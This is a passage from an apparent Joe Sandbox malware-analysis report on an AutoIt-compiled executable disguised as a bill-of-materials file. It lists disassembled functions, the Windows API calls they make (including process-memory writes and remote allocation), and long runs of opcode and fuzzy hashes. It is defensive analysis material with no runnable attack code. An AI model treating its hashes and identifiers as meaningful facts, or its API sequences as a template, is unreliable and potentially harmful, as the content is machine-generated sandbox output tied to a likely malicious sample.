                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Path$ObjectStroke$DeleteFillSelect
                        • String ID:
                        • API String ID: 2625713937-0
                        • Opcode ID: 5cdcc12b845f7277d1ffe16f25359259770ae86d52786bc99064f619a5adf66a
                        • Instruction ID: 85e92859b8d61c1a982ebb4056d3cc0f03d467180297ba19382af70a4e8a123a
                        • Opcode Fuzzy Hash: 5cdcc12b845f7277d1ffe16f25359259770ae86d52786bc99064f619a5adf66a
                        • Instruction Fuzzy Hash: 83F04F71005204EFDB135F65EE1CB653FA9BB01332F148225F469A90F0C734A991DF28
                        Function 00360F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: __freea$_free
                        • String ID: a/p$am/pm
                        • API String ID: 3432400110-3206640213
                        • Opcode ID: aff7bbb9f3c84de0c01fbc417cefb8f160a1ee63aae78cfa09716651790a1d71
                        • Instruction ID: ac3fc6f415ba77bcb67fda250c3576871ab36d4fc048c988165f79a1dedc038a
                        • Opcode Fuzzy Hash: aff7bbb9f3c84de0c01fbc417cefb8f160a1ee63aae78cfa09716651790a1d71
                        • Instruction Fuzzy Hash: 45D10339900206CACB2B9F68C855BFAB7B4FF06300F2DC159E9069BB58D3759D80CB91
                        Function 003B61D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00350242: EnterCriticalSection.KERNEL32(0040070C,00401884,?,?,0034198B,00402518,?,?,?,003312F9,00000000), ref: 0035024D
                          • Part of subcall function 00350242: LeaveCriticalSection.KERNEL32(0040070C,?,0034198B,00402518,?,?,?,003312F9,00000000), ref: 0035028A
                          • Part of subcall function 003500A3: __onexit.LIBCMT ref: 003500A9
                        • __Init_thread_footer.LIBCMT ref: 003B6238
                          • Part of subcall function 003501F8: EnterCriticalSection.KERNEL32(0040070C,?,?,00348747,00402514), ref: 00350202
                          • Part of subcall function 003501F8: LeaveCriticalSection.KERNEL32(0040070C,?,00348747,00402514), ref: 00350235
                          • Part of subcall function 003A359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 003A35E4
                          • Part of subcall function 003A359C: LoadStringW.USER32(00402390,?,00000FFF,?), ref: 003A360A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                        • String ID: x#@$x#@$x#@
                        • API String ID: 1072379062-2468959183
                        • Opcode ID: 3aad11503061272188dd651fa1783af55f7198b2de37a8a20ca64c5f25540910
                        • Instruction ID: df6b68be03d2e3ac3a4eee46a37992ed5722ace6b75ef8d3fab6bd6f5d8952ed
                        • Opcode Fuzzy Hash: 3aad11503061272188dd651fa1783af55f7198b2de37a8a20ca64c5f25540910
                        • Instruction Fuzzy Hash: 90C19071A00105AFDB26DF58C891EFEB7B9EF49304F11802AFA05AB692D774ED44CB90
                        Function 00368A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00368B6E
                        • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00368B7A
                        • __dosmaperr.LIBCMT ref: 00368B81
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ByteCharErrorLastMultiWide__dosmaperr
                        • String ID: .5
                        • API String ID: 2434981716-4279605997
                        • Opcode ID: 402a0d0688d3c158dc701cd06dad14a6e7f003127cde269439354ef8be1761f5
                        • Instruction ID: 5e70548a9316937d7a28264921870ad77b51c1bfeda0cebb3368f074f60b3547
                        • Opcode Fuzzy Hash: 402a0d0688d3c158dc701cd06dad14a6e7f003127cde269439354ef8be1761f5
                        • Instruction Fuzzy Hash: 7F41ACB0604045AFDB239F68C880AB93FAADF4D304F29C7A9F8849B546DE318C029794
                        Function 00392716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0039B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003921D0,?,?,00000034,00000800,?,00000034), ref: 0039B42D
                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00392760
                          • Part of subcall function 0039B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003921FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0039B3F8
                          • Part of subcall function 0039B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0039B355
                          • Part of subcall function 0039B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00392194,00000034,?,?,00001004,00000000,00000000), ref: 0039B365
                          • Part of subcall function 0039B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00392194,00000034,?,?,00001004,00000000,00000000), ref: 0039B37B
                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003927CD
                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0039281A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                        • String ID: @
                        • API String ID: 4150878124-2766056989
                        • Opcode ID: a0442feec99f3f3b1edf5e39ea79fb409f6be6ac1a0ce769fd78c2a38367db28
                        • Instruction ID: 7aff7f628fe8d37d735bfad4391065f33ac8b6b1b30bc84e8cc53f73a63405f5
                        • Opcode Fuzzy Hash: a0442feec99f3f3b1edf5e39ea79fb409f6be6ac1a0ce769fd78c2a38367db28
                        • Instruction Fuzzy Hash: 1A411976900218BFDF11DBA4DD85EEEBBB8AF09700F104099FA55BB181DB706E45CBA1
                        Function 0036172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe,00000104), ref: 00361769
                        • _free.LIBCMT ref: 00361834
                        • _free.LIBCMT ref: 0036183E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _free$FileModuleName
                        • String ID: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe
                        • API String ID: 2506810119-2736972374
                        • Opcode ID: 159f272cd527022671e5e495871a60463cfd350944dad346f3c5ea2c8e839bdc
                        • Instruction ID: c317a8b2fc711ad3273c61253e9826ea5b29ea32b00640d5d325b23abcc850fd
                        • Opcode Fuzzy Hash: 159f272cd527022671e5e495871a60463cfd350944dad346f3c5ea2c8e839bdc
                        • Instruction Fuzzy Hash: 57316275A00218AFDB22DF99D885D9EBBFCEB85310F1981AAF804EB215D7705E40DB94
                        Function 0039C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0039C306
                        • DeleteMenu.USER32(?,00000007,00000000), ref: 0039C34C
                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00401990,014B6338), ref: 0039C395
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Menu$Delete$InfoItem
                        • String ID: 0
                        • API String ID: 135850232-4108050209
                        • Opcode ID: b7d854bce3bead105c4f2876946c0bf6eeff0ed16475dd4e220befff1665423e
                        • Instruction ID: b4012bb34a01f058eeb0d8979df098bbfc3d38313656e41eb7db57a7f4f4cdd0
                        • Opcode Fuzzy Hash: b7d854bce3bead105c4f2876946c0bf6eeff0ed16475dd4e220befff1665423e
                        • Instruction Fuzzy Hash: 8041B0752143019FDB22DF29D884F5ABBE8AF85320F019A1DF8A59B2D1D774E904CB52
                        Function 003C4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                        Download Yara Rule
                        APIs
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003CCC08,00000000,?,?,?,?), ref: 003C44AA
                        • GetWindowLongW.USER32 ref: 003C44C7
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003C44D7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$Long
                        • String ID: SysTreeView32
                        • API String ID: 847901565-1698111956
                        • Opcode ID: 12c1191efdf9e1eee3a55adff5cc993c91925e73c5cfdcea5afa82250c9191e3
                        • Instruction ID: f6367b859199bf80929edfaf55b922dadda588c3dae33a05f67c332d0c13406f
                        • Opcode Fuzzy Hash: 12c1191efdf9e1eee3a55adff5cc993c91925e73c5cfdcea5afa82250c9191e3
                        • Instruction Fuzzy Hash: 4B319C31210605AFDB269E38DC45FEA7BA9EB09334F214319F979D21E0DB70EC509750
                        Function 00396E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON
                        Download Yara Rule
                        APIs
                        • SysReAllocString.OLEAUT32(?,?), ref: 00396EED
                        • VariantCopyInd.OLEAUT32(?,?), ref: 00396F08
                        • VariantClear.OLEAUT32(?), ref: 00396F12
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Variant$AllocClearCopyString
                        • String ID: *j9
                        • API String ID: 2173805711-176951553
                        • Opcode ID: 315bd389031dfa11f3dec907a98e481934f60fd4baac8bf3d61a33e8bd8c563f
                        • Instruction ID: b705bf688e54ef7a59d5206405f44eb6e8233ac1f4022b5bf0502d312d95d3a5
                        • Opcode Fuzzy Hash: 315bd389031dfa11f3dec907a98e481934f60fd4baac8bf3d61a33e8bd8c563f
                        • Instruction Fuzzy Hash: 7C319172605245DFCF0BAFA4E8929BE77B9EF85300F101499F9038F2A1C7349926DB90
                        Function 003B304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 003B335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,003B3077,?,?), ref: 003B3378
                        • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 003B307A
                        • _wcslen.LIBCMT ref: 003B309B
                        • htons.WSOCK32(00000000,?,?,00000000), ref: 003B3106
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                        • String ID: 255.255.255.255
                        • API String ID: 946324512-2422070025
                        • Opcode ID: 6c2f71c9510aae49f6c3d38aaa2a82d38e2e133de297ee3aee945aadb3528b4c
                        • Instruction ID: b63b7ab4c1a28d079f260f7bd3f77169783fbd3594a0f15045c1865112225825
                        • Opcode Fuzzy Hash: 6c2f71c9510aae49f6c3d38aaa2a82d38e2e133de297ee3aee945aadb3528b4c
                        • Instruction Fuzzy Hash: F43104396042159FC712EF28C881EAA77E4EF1431CF258059EA168FB92CB32EE41C760
                        Function 003C4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003C4705
                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003C4713
                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003C471A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend$DestroyWindow
                        • String ID: msctls_updown32
                        • API String ID: 4014797782-2298589950
                        • Opcode ID: 4950e1c918ff542e62966665ed615328c31da3d3713dd059de3cc1d48875d5fc
                        • Instruction ID: cfc68169a0acc532e8b678aa393162e86cd34f2a90ae0598d3fb2a8b6029c534
                        • Opcode Fuzzy Hash: 4950e1c918ff542e62966665ed615328c31da3d3713dd059de3cc1d48875d5fc
                        • Instruction Fuzzy Hash: E0213CB5600209AFDB12DF64DCD1EA737ADEB5A3A4B050059FA14DB361CB71EC61CB60
                        Function 003995AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _wcslen
                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                        • API String ID: 176396367-2734436370
                        • Opcode ID: 2b59efab01058e728960f34614db7546d66df7558f5461933fa1ce409d622dde
                        • Instruction ID: 852d1bb2330312b9ce79dd4fe663ebd2cdac7eede3c81f5f8a4493415198c018
                        • Opcode Fuzzy Hash: 2b59efab01058e728960f34614db7546d66df7558f5461933fa1ce409d622dde
                        • Instruction Fuzzy Hash: 3521F67210451166DB33AB2C9802FB7B3AC9F52320F15402FF9499B151EB51AD85C3D5
                        Function 003C37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003C3840
                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003C3850
                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003C3876
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend$MoveWindow
                        • String ID: Listbox
                        • API String ID: 3315199576-2633736733
                        • Opcode ID: 47636599bfc923a6812072b30dcd3a8048a68eebf535438b6c4eea88ff466787
                        • Instruction ID: 8a3823e25108a6dbbafb5654e828ce25abd8c37d4597314c1dcd2c4729c8d8ee
                        • Opcode Fuzzy Hash: 47636599bfc923a6812072b30dcd3a8048a68eebf535438b6c4eea88ff466787
                        • Instruction Fuzzy Hash: 4C218E72610218BFEB229F54DC85FBB376EEF89750F118128F9049B190C671ED528BA0
                        Function 003A49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 003A4A08
                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 003A4A5C
                        • SetErrorMode.KERNEL32(00000000,?,?,003CCC08), ref: 003A4AD0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorMode$InformationVolume
                        • String ID: %lu
                        • API String ID: 2507767853-685833217
                        • Opcode ID: 442bf6131a261830d78864a5cc21ae1deda71ffeae45cd81c68b8e6860ef647d
                        • Instruction ID: db089c2daffb25a214d453c92d172efc047f42ec9a907c047d542da516fe3a89
                        • Opcode Fuzzy Hash: 442bf6131a261830d78864a5cc21ae1deda71ffeae45cd81c68b8e6860ef647d
                        • Instruction Fuzzy Hash: 33317171A00108AFDB12DF54C885EAA7BF8EF49308F1480A9F909DF252D771ED45CB61
                        Function 003C41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003C424F
                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003C4264
                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003C4271
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: msctls_trackbar32
                        • API String ID: 3850602802-1010561917
                        • Opcode ID: 8fd18ca818e6ac25a93e15cd30182bcf49390dadbded13a5bcf79cb878ce14f2
                        • Instruction ID: c213343a34dd9f69a11cfb9ef99fd57bf5c7732f0140e35560399df522dae9a6
                        • Opcode Fuzzy Hash: 8fd18ca818e6ac25a93e15cd30182bcf49390dadbded13a5bcf79cb878ce14f2
                        • Instruction Fuzzy Hash: 87110632240208BEEF225F28CC46FAB7BACEF95B54F020528FA55E60A0D271DC619B10
                        Function 00392F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                          • Part of subcall function 00392DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00392DC5
                          • Part of subcall function 00392DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00392DD6
                          • Part of subcall function 00392DA7: GetCurrentThreadId.KERNEL32 ref: 00392DDD
                          • Part of subcall function 00392DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00392DE4
                        • GetFocus.USER32 ref: 00392F78
                          • Part of subcall function 00392DEE: GetParent.USER32(00000000), ref: 00392DF9
                        • GetClassNameW.USER32(?,?,00000100), ref: 00392FC3
                        • EnumChildWindows.USER32(?,0039303B), ref: 00392FEB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                        • String ID: %s%d
                        • API String ID: 1272988791-1110647743
                        • Opcode ID: 0f1749d1a5c5d3131b9833cd770872354c3de9b9966bf75907c0d63dbff41b99
                        • Instruction ID: 96b47279452b40b812e9ec48536101cbe77568ce69f1a9b7a005ebf95e6073ec
                        • Opcode Fuzzy Hash: 0f1749d1a5c5d3131b9833cd770872354c3de9b9966bf75907c0d63dbff41b99
                        • Instruction Fuzzy Hash: 9E11B4B16002056BDF167F748CDAEEE776AAF84304F048075FA19DF252DE3099458B60
                        Function 003C5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 003C58C1
                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 003C58EE
                        • DrawMenuBar.USER32(?), ref: 003C58FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
